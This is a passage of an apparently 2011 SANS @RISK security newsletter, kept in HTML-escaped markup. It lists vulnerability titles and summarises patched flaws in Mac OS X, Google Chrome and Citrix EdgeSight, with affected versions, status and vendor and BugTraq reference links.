11.27.1&amp;nbsp; - Easewe FTP OCX ActiveX Control "EaseWeFtp.ocx" Multiple Insecure Method Vulnerabilities&lt;br /&gt;
11.27.2&amp;nbsp; - xAurora "RSRC32.DLL" DLL Loading Arbitrary Code Execution&lt;br /&gt;
11.27.3&amp;nbsp; - FreeAmp ".pls" File Buffer Overflow&lt;br /&gt;
11.27.4&amp;nbsp; - Winamp Multiple Remote Issues&lt;br /&gt;
11.27.5&amp;nbsp; - MySQLDriverCS SQL Injection&lt;br /&gt;
11.27.6&amp;nbsp; - Novell ZENworks Handheld Management "ZfHSrvr .exe" Se rvice Directory Traversal&lt;br /&gt;
11.27.7&amp;nbsp; - CygniCon CyViewer ActiveX Control "SaveData()" Insecure Method Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;b&gt;-- Mac Os&lt;/b&gt;&lt;br /&gt;
11.27.8&amp;nbsp; - Apple Mac OS X Multiple Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;b&gt;-- BSD&lt;/b&gt;&lt;br /&gt;
11.27.9&amp;nbsp; - tftp-hpa FTP Server "utimeout" Option Remote Buffer Overflow&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;b&gt;-- Novell&lt;/b&gt;&lt;br /&gt;
11.27.10 - Novell File Reporter "NFRAgent.exe" Security Bypass&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;b&gt;-- Cross Platform&lt;/b&gt;&lt;br /&gt;
11.27.11 - Torque "job name" Argument Remote Buffer Overflow&lt;br /&gt;
11.27.12 - Rampart "util/rampart_timestamp_token.c" Remote Security Bypass&lt;br /&gt;
11.27.13 - LibreOffice ".lwp" File Multiple Remote Stack Buffer Overflow Vulnerabilities&lt;br /&gt;
11.27.14 - Wireshark "bytes_repr_len()" NULL Pointer Dereference Denial of Service&lt;br /&gt;
11.27.15 - cURL/libcURL GSS/Negotiate Feature Spoofing Security Vulnerability&lt;br /&gt;
11.27.16 - Asterisk Multiple Remote Denial of Service Vulnerabilities&lt;br /&gt;
11.27.17 - Apache Tomcat "MemoryUserDatabase" Information Disclosure&lt;br /&gt;
11.27.18 - D-Bus Configuration Insecure Temporary File Creation Vulnerability&lt;br /&gt;
11.27.19 - Sybase Advantage Server "ADS" Process Off-By-One Buffer Overflow 11.27.20 - Google Chrome Multiple Security Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;b&gt;-- Web Application - SQL Injection&lt;/b&gt;&lt;br /&gt;
11.27.21 - IdevSpot iSupport "x_category" Parameter SQL Injection&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;b&gt;-- Web Application&lt;/b&gt;&lt;br /&gt;
11.27.22 - ActivDesk Multiple Cross-Site Scripting and SQL Injection Vulnerabilities&lt;br /&gt;
11.27.23 - Nodesforum "3rd_party_limits.php" Remote File Include Vulnerability&lt;br /&gt;
11.27.24 - Avactis Shopping Cart Security Bypass and HTML Injection Vulnerabilities&lt;br /&gt;
11.27.25 - phpMyAdmin "$_SESSION" Array Unauthorized Access Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;b&gt;-- Network Device&lt;/b&gt;&lt;br /&gt;
11.27.26 - IBM Web Application Firewall Security Bypass&lt;br /&gt;
11.27.27 - H3C ER5100 Authentication Bypass Vulnerability ______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; PART I Critical Vulnerabilities&lt;/b&gt;&lt;br /&gt;
Part I for this issue has been compiled by Josh Bronson at TippingPoint, a division of HP, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.sans.org/newsletters/risk/#process"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.sans.org/newsletters/risk/#process&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
(1) HIGH: Mac OS/X Multiple Security Vulnerabilities&lt;br /&gt;
Affected:&lt;br /&gt;
Mac OS X prior to 10.6.8&lt;br /&gt;
&lt;br /&gt;
Description: Apple has released patches for multiple vulnerabilites affecting products related to Mac OS/X. The issues include code-execution vulnerabilities in the following components: Apple Type Services (ATS), CoreFoundation, CoreGraphics, ImageIO, Internal Components for Unicode (ICU), QuickLook, QuickTime, and Samba. The Samba vulnerabilities require a connection to a share on the vulnerable server. Except for the vulnerabilities in the CoreFoundation and ICU libraries, which may provide many unknown vectors of attack, all of the other vulnerabilities require an attacker to entice a target to open a malicious file or view a malicious site in order to execute arbitrary code on the target's machine.&lt;br /&gt;
&lt;br /&gt;
Status: vendor confirmed, updates available&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; References:&lt;/b&gt;&lt;br /&gt;
Vendor Site&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.apple.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.apple.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;Apple Security Update&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://support.apple.com/kb/HT4723"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://support.apple.com/kb/HT4723&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;SecurityFocus BugTraq IDs&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/38562"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/38562&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/39013"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/39013&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/42599"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/42599&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/42646"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/42646&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/43212"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/43212&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/43676"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/43676&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/43819"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/43819&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/44794"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/44794&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/44884"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/44884&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/45164"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/45164&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/46264"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/46264&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/46597"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/46597&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/46734"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/46734&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/46768"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/46768&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/47668"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/47668&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48415"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48415&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48416"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48416&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48418"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48418&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48419"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48419&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48420"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48420&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48422"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48422&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48426"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48426&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48427"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48427&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48429"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48429&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48430"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48430&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48436"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48436&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48437"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48437&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48439"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48439&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48440"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48440&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48442"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48442&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48443"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48443&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48444"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48444&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48445"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48445&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48447"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48447&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
(2) MEDIUM: Google Chrome Multiple Vulnerabilities&lt;br /&gt;
Affected:&lt;br /&gt;
Google Chrome Prior to 12.0.742.112&lt;br /&gt;
&lt;br /&gt;
Description: Google has released a patch for multiple security vulnerabilities affecting its Chrome web browser. Six vulnerabilities have been rated "High" severity by Google. They include two use-after-free vulnerabilities in SVG (scalar vector graphics), a memory corruption in CSS parsing, potential race conditions in the HTML parser, a "bad bounds check" in v8, and a use-after-free vulnerability in text selection. Chrome is designed to automatically update itself when connected to the internet. By enticing a target to view a malicious site, an attacker can exploit these vulnerabilities in order to execute arbitrary code on the target's machine.&lt;br /&gt;
&lt;br /&gt;
Status: vendor confirmed, updates available&lt;br /&gt;
&lt;br /&gt;
References:&lt;br /&gt;
Vendor Site&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.google.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.google.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
Google Stable Channel Updates&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://googlechromereleases.blogspot.com/2011/06/stable-channel-update_28.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://googlechromereleases.blogspot.com/2011/06/stable-channel-update_28.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
SecurityFocus BugTraq ID&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48479/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48479/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
(3) MEDIUM: Citrix EdgeSight Launcher Service Heap buffer Overflow&lt;br /&gt;
Affected:&lt;br /&gt;
Citrix EdgeSight for Activ Application Monitoring prior to 5.3 SP2 Citrix EdgeSight for Load Testing prior to 3.8.1&lt;br /&gt;
&lt;br /&gt;
Description: Citrix has released a patch for its EdgeSight product addressing a security vulnerability. EdgeSight is designed to manage and monitor XenApp, Presentation Server, and XenDesktop. Together, these services are designed to centralize application delivery and monitor networks for problems. One component of the EdgeSight product, LauncherService.exe, listens by default on port 18747 and copies attacker-controlled data onto a fixed-length heap buffer. By sending a malicious request, an attacker can exploit this vulnerability in order to execute arbitra ry code on the target's machine with SYSTEM-level privileges.&lt;br /&gt;
&lt;br /&gt;
Status: vendor confirmed, updates available&lt;br /&gt;
&lt;br /&gt;
References: Vendor Site &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.citrix.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.citrix.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt; Citrix Security Article&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://support.citrix.com/article/CTX129699"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://support.citrix.com/article/CTX129699&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt; Zero Day Initiative Advisory &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-226/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-226/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt; SecurityFocus BugTraq ID 